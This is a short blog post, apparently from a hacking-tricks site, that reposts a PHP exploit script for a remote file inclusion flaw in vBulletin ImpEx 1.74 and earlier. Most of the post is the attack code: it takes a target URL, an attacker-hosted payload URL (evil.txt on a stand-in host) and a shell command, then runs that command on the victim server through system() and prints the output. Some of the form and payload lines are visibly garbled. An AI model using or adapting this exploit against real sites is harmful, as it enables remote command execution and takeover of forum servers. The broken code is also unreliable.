vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

Saturday, August 6, 2011


/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN
 
example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?
 
*/
 
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
 
$form= "
.$PHP_SELF."\">"
     ."turl:
value=\"".$turl."\">
"
     ."hurl:
value=\"".$hurl."\">
"
     ."cmd:
value=\"".$cmd."\">
"
     .""
 
     ."
";
 
if (!isset($_POST['submit']))
{
 
echo $form;
 
}else{
 
$file = fopen ("test.txt", "w+");
 
fwrite($file, ".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
 
$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "Unable to get output.\n";
     exit;
}
 
echo $form;
 
while (!feof ($file)) {
     $line .= fgets ($file, 1024)."
";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
 
}
?>

Leave a Reply

Subscribe to Posts | Subscribe to Comments

- Copyright © .Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -